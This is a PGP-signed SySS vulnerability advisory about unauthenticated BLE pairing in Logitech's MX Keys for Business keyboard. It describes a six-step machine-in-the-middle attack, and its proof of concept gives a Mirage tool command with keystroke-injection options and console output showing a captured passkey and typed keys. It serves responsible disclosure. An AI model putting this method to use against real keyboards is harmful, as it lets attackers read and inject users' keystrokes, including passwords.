-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-084 Product: MX Keys for Business Manufacturer: Logitech Affected Version(s): Firmware Version RBK81.01_0015 Tested Version(s): Firmware Version RBK81.01_0015 Vulnerability Type: Channel Accessible by Non-Endpoint (Machine-in-the-Middle, CWE-300) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-09-25 Solution Date: - Public Disclosure: 2024-12-10 CVE Reference: Not yet assigned Author of Advisory: Pascal Rockenstiehl (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: MX Keys for Business is a wireless keyboard from Logitech that uses a proprietary protocol called Logi Bolt, which is based on Bluetooth Low Energy (BLE). The manufacturer describes the product as follows (see [1]): "MX Keys for Business features Logi Bolt wireless technology, engineered to conquer IT challenges that can arise with both in-office and remote users. Delivering cross-platform compatibility and reliable wireless connections — even in congested wireless environments. Fully encrypted and FIPS secure when paired with a Logi Bolt USB receiver." Due to the keyboard not enforcing any sort of authentication during the pairings, MX Keys for Business is vulnerable to machine-in-the-middle (MitM) attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: SySS GmbH discovered that the keyboard does not enforce any sort of authentication when a central device is pairing with it. When a central device with NoInputNoOutput as IO Capabilities is trying to pair with the keyboard, Just Works is performed as key generation method, which provides no authentication. After the pairing process is finished, the central device is able to subscribe to the HID characteristics and get notified on every keystroke typed. This behavior allows an attacker to perform an MitM attack in the following manner: 1. The attacker detects the advertising packets of the keyboard. 2. The attacker pairs with the keyboard as described above. 3. The attacker clones the keyboard and starts sending advertising packets. 4. On the incoming pairing request from the victim's central device, the attacker and the central device start a normal pairing using a passkey entry. The victim's central device now displays a six-digit passkey. 5. The victim sees the displayed passkey and enters the six-digit number into the keyboard, unaware of the attacker. Since the keyboard is already connected to the attacker, the keystrokes performed by the victim to authenticate the keyboard are sent to the attacker as normal keystrokes. 6. The attacker, now in possession of the passkey, can complete the pairing between the fake keyboard and the central device of the victim. The attacker is now in an MitM position, where he can see unencrypted keystrokes and inject his own keystrokes, all while forwarding every package between the victim's keyboard and the central device to stay undetected. Therefore, this vulnerability corrupts the confidentiality, integrity, and availability of the communication between keyboard and central device. There are two ways to connect the keyboard to a computer: 1. Directly over BLE (if the computer is capable) 2. Over a special USB dongle from Logitech which uses the Logi Bolt protocol This MitM attack is possible in both scenarios, but can only be executed successfully when an initial pairing between the keyboard and a non-bonded device is performed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): For demonstrating the offline brute-force attack, Pascal Rockenstiehl developed a sample BLE MitM software tool which executes the attack on a victim keyboard with a pre-configured device address. The following lines show relevant parts of the attacker console output: (venv) pascal@pascal:~/Desktop/extended-mirrage/mirage$ sudo venv/bin/mirage ble_sc_mitm INTERFACE1=hci1 INTERFACE2=hci0 ADVERTISING_STRATEGY=preconnect CONNECTION_TYPE=random SCENARIO=ble_hid_mitm DUCKYSCRIPT=duckyscript.txt TARGET=D5:BB:76:E9:2F:AA [SUCCESS] [13:33:17.946793] Entering SCAN stage ... [INFO] [13:33:17.958615] << BLE - Advertisement Packet | type=ADV_IND | addr=D5:BB:76:E9:2F:AA | data=0201050319c1030503121872fd0a084d58204b455953204206ff0600030080 >> [INFO] [13:33:17.960012] << BLE - Advertisement Packet | type=SCAN_RSP | addr=D5:BB:76:E9:2F:AA | data=0a094d58204b45595320420b1672fd10010180b3010100020a04 >> [SUCCESS] [13:33:17.960213] Entering CLONE stage ... [INFO] [13:33:17.962807] Changing HCI Device (hci0) Random Address to : D5:BB:76:E9:2F:AA [INFO] [13:33:17.974031] Connecting to slave D5:BB:76:E9:2F:AA... [SUCCESS] [13:33:18.174431] Connected on slave : D5:BB:76:E9:2F:AA [INFO] [13:33:18.175654] << BLE - Pairing Request Packet | outOfBand=no | inputOutputCapability=0x3 | authentication=0x1d | maxKeySize=16 | initiatorKeyDistribution=0x3 | responderKeyDistribution=0x3 >> [SUCCESS] [13:33:18.178032] Started Advertising. Entering WAIT_CONNECTION stage ... [INFO] [13:33:18.347041] << BLE - Pairing Response Packet | outOfBand=no | inputOutputCapability=0x2 | authentication=0x1d | maxKeySize=16 | initiatorKeyDistribution=0x2 | responderKeyDistribution=0x3 >> ... [INFO] [13:33:19.047399] Slave pairing finished [SUCCESS] [13:33:22.107479] Master connected : FD:02:62:46:53:C5 ... [INFO] [13:33:24.392071] Expecting victim to input passkey... [SUCCESS] [13:33:26.366697] Keypress detected: 7(numpad) [SUCCESS] [13:33:26.841762] Keypress detected: 9(numpad) [SUCCESS] [13:33:27.541463] Keypress detected: 6(numpad) [SUCCESS] [13:33:27.791397] Keypress detected: 5(numpad) [SUCCESS] [13:33:28.441406] Keypress detected: 2(numpad) [SUCCESS] [13:33:28.966535] Keypress detected: 0(numpad) [SUCCESS] [13:33:29.591355] Keypress detected: ENTER(numpad) [SUCCESS] [13:33:29.591491] the user entered the passcode: 796520 ... [INFO] [13:33:30.570086] Master pairing finished [SUCCESS] [13:33:30.570222] Entering ACTIVE_MITM stage ... ... [SUCCESS] [13:33:45.774723] Keypress detected: a [SUCCESS] [13:33:46.024752] Keypress detected: b ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS GmbH is currently not aware of a security fix for the described issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-09-25: Vulnerability reported to manufacturer 2024-09-25: Manufacturer acknowledges receipt of security advisory 2024-09-30: E-mail to manufcaturer concernung status update 2024-09-30: Received current status from manufacturer 2024-11-26: E-mail to manufacturer concerning status update 2024-12-10: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for MX Keys for Business http://www.logitech.com/en-us/product/mx-keys-for-business [2] SySS Security Advisory SYSS-2024-084 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-084.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Pascal Rockenstiehl of SySS GmbH. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: http://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAmdW7I8ACgkQ2aS/ajSt Tassuw//TUPiORLVEjg+1p5jYtYFGrArRgKa6dnpPf5ed5nn8AtQhVSvH7+UmnaX IAapDCqgMi9N2MX47lFNs6ugP2SHMDHkmNys2ABvIy0D+YqGtvq3aOv/dOFny2DO yab/ILmazaSpiTORp9N83OBQGKynlw2TCFz13Uua0Lj5cFvBKQxjlVEvRc30Idna VyH9OiewCpq/AycXFr/H9Zi26PKrPn+evARxCIXbMoqcNQqdOIhUQdEuk/SsINwO UAmX5NQNiASpU/HKLHMn9Df0zhGdlpedF5b5GjJE7QJQmm1/EBuT0QBmYGeh+NzZ TC+lNTS9OP1yzoB3ZMbF2sIBKC0+SkNXsZul/IqStkns3llUlpLCi5tJD2IBhmWx aNQ17csO6Sk1zZxtfF7OJMOFTUplIn138u9cYGrDYhJ04SqvtSVru0sQwrKs35Vh NUHXyqL92t3G/JL8ImK0IkqwW1Rg7h9/kwrj5q0U/Vq5SFWSPBA1D9xqYowBYghy owA0d39dYA5FCKwZLSfk3iX/14PnEuV+aZPQBUqn4E8Q1BHTxavXkCb92YF206vb 9i6BHKLsVDaJbM30AvmK4a/gXgFZTRlypoW64Hj/nmLK1IhzlEDNfMfBORc+1BfX ToiO+e2QhIrmaf365oJ+HfTs556C+M+g5JRO+jsbjfwEoXTTB20= =d2xx -----END PGP SIGNATURE-----